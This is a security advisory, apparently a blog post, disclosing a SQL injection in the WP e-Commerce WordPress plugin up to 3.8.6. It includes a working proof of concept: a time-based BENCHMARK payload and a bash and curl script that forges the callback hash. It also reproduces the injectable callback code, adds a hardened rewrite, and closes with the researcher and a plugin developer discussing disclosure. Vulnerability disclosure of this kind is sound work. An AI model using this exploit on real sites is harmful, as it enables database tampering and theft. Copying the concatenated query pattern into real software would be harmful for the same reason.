# Exploit Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
# Date: 2011-09-13
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-e-commerce.3.8.6.zip
# Version: 3.8.6 (tested)
# Note: parameter $_POST["cs3"] == md5(md5(urldecode($_POST["cs1"])))
# the plugin has a "chronopay_salt" option, but it is set to '' by default
# (see the description further down)
---------------
PoC (POST data)
---------------
http://www.site.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill
e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
hash=`echo -n "$payload" | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill" 'http://www.site.com/?chronopay_callback=true'
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:
class WP_eCommerce {
    function WP_eCommerce() {
        add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
    }
    ...
    function init() {
        ...
        $this->load();
        ...
    }
    function load() {
        ...
        wpsc_core_load_gateways();
        ...
    }
    ...
}
$wpec = new WP_eCommerce();
./wp-e-commerce/wpsc-core/wpsc-functions.php:
function wpsc_core_load_gateways() {
    global $nzshpcrt_gateways, $num, $wpsc_gateways, $gateway_checkout_form_fields;
    $gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
    $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
    $num = 0;
    foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
        if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
            require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
        }
        ...
    }
    ...
}
./wp-e-commerce/wpsc-merchants/chronopay.php:
function nzshpcrt_chronopay_callback()
{
    ...
    if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
    {
        $salt = get_option('chronopay_salt');
        // - this is '' by default and is set only if explicitly stated
        //   inside Store Settings->Payments->General Settings->
        //   Chronopay->Edit->Security Key
        // - the problem is that more popular payment gateways are listed
        //   alongside it (e.g. Google Checkout and PayPal), and if that
        //   setting is not explicitly set, the door is left wide open to a
        //   potential attacker
        $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
        if($gen_hash == $_POST['cs3'])
        {
            ...
            $sessionid = trim(stripslashes($_POST['cs1']));
            $transaction_id = trim(stripslashes($_POST['transaction_id']));
            $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
            $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
            switch($verification_data['trans_type'])
            {
                ...
                case 'rebill':
                    $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
                        `processed` = '2',
                        `transactid` = '".$transaction_id."',
                        `date` = '".time()."'
                        WHERE `sessionid` = ".$sessionid." LIMIT 1");
                    ...
            }
        }
    }
}
add_action('init', 'nzshpcrt_chronopay_callback');
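From the defensive side, an added example (not the plugin's code and not the vendor's 3.8.6.1 fix, which is not reproduced here): a hardened form of the callback excerpted above that refuses to run without a configured chronopay_salt, compares the hash with hash_equals(), and binds sessionid through $wpdb->prepare() instead of concatenating it. It assumes sessionid is numeric, as the unquoted comparison in the original query implies; the function name is hypothetical.

```php
// Added example (not the plugin's or vendor's code): a hardened rewrite of the
// ChronoPay callback above. Same request contract, three fixes:
//   1. empty 'chronopay_salt' makes cs3 attacker-computable, so refuse;
//   2. == on the hash becomes a typed, constant-time hash_equals();
//   3. cs1 is bound with $wpdb->prepare() as %d instead of concatenated.
// Assumes sessionid is numeric (original compares it unquoted); function name is hypothetical.
function wpsc_chronopay_callback_hardened() {
    global $wpdb;
    if ( ! isset( $_GET['chronopay_callback'] ) || $_GET['chronopay_callback'] !== 'true' ) {
        return;
    }
    foreach ( array( 'cs1', 'cs2', 'cs3' ) as $key ) {
        if ( ! isset( $_POST[ $key ] ) || ! is_string( $_POST[ $key ] ) ) {
            return; // missing or non-scalar field: not a ChronoPay callback
        }
    }
    if ( $_POST['cs2'] !== 'chronopay' ) {
        return;
    }
    // 1. No configured shared secret means the callback cannot be authenticated.
    $salt = get_option( 'chronopay_salt' );
    if ( ! is_string( $salt ) || $salt === '' ) {
        status_header( 403 );
        exit;
    }
    // 2. Same construction as the original, compared in constant time.
    $gen_hash = md5( $salt . md5( $_POST['cs1'] . $salt ) );
    if ( ! hash_equals( $gen_hash, $_POST['cs3'] ) ) {
        status_header( 403 );
        exit;
    }
    // 3. Only a decimal session id is acceptable; reject anything else early.
    $cs1 = trim( $_POST['cs1'] );
    if ( ! ctype_digit( $cs1 ) ) {
        status_header( 400 );
        exit;
    }
    $sessionid      = (int) $cs1;
    $transaction_id = isset( $_POST['transaction_id'] ) ? trim( (string) $_POST['transaction_id'] ) : '';
    $trans_type     = isset( $_POST['transaction_type'] ) ? trim( (string) $_POST['transaction_type'] ) : '';
    if ( 'rebill' === $trans_type ) {
        // %s is quoted and escaped, %d is cast to int: no request value reaches the SQL parser as code.
        $wpdb->query( $wpdb->prepare(
            "UPDATE `" . WPSC_TABLE_PURCHASE_LOGS . "` SET `processed` = '2', `transactid` = %s, `date` = %d WHERE `sessionid` = %d LIMIT 1",
            $transaction_id, time(), $sessionid
        ) );
    }
}
add_action( 'init', 'wpsc_chronopay_callback_hardened' );
```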
p.s. automated tools are easily adapted to exploit this vulnerability
p.p.s.:
32 comments:
Hi Miroslav,
I'm Gary, lead developer of WP e-Commerce plugin.
Thanks for discovering and contacting us regarding this security vulnerability.
We've pushed out a fix for this in 3.8.6.1 and 3.7.8.1.
Although we appreciate your good intentions, if next time you discover a security hole, please let us have a chance to fix it before disclosing it to the public. This is to prevent malicious hackers from taking advantage of the vulnerability before users have a chance to upgrade their website.
Thanks again!
Gary.
Dear Gary.
I've tried to send you details far before the public disclosure but your boss just buzzed me off. I've asked him politely for any contact information and he replied with "i have no idea what you're talking about or who you are".
Kind regards
@garyc40 This is disturbing to hear, not the exploit which was dealt with quickly, but the fact that Miroslav tried to notify you and was blown off. I use WP e-commerce and have purchased Gold Cart and expect more.
I'm upgrading now and putting out an urgent message to customers, will put a post together to explain in simple terms how to patch this without upgrading to 3.8.6.1. Thanks for the heads up Miroslav! :)
Hi Miroslav, mike:
I'm sure it was unintentional when Dan said he didn't know who you were and what you were talking about.
In the tweet that you tagged him, you didn't explain that you discovered the exploit. In the tweet before that when you said you hit the jackpot, you didn't tag him. So I guess he didn't know the context of the conversation.
We really appreciate help from the community, and if you look at our announcement post of the release, your name is credited as it should be.
Really sorry for the misunderstanding. Dan's on a business trip and is simply too busy, so I hope you understand that he was confused.
Don't hesitate to contact us next time when you find any other issue or have suggestions. You can contact us via the Contact form on getshopped.org, or send me an email to gary@instinct.co.nz. Our google code repository is also the main place where bugs and issues are discussed (code.google.com/p/wp-e-commerce), but for security issues, email is the safest route.
Best,
Gary.
Just double checked and saw that our contact form was unpublished for some reason. I'm checking with other team mates about that. Sorry for the inconvenience!
@gary: "contact form was unpublished for some reason" - that was the main reason I contacted Dan in the first place. I couldn't find any other way to contact you guys.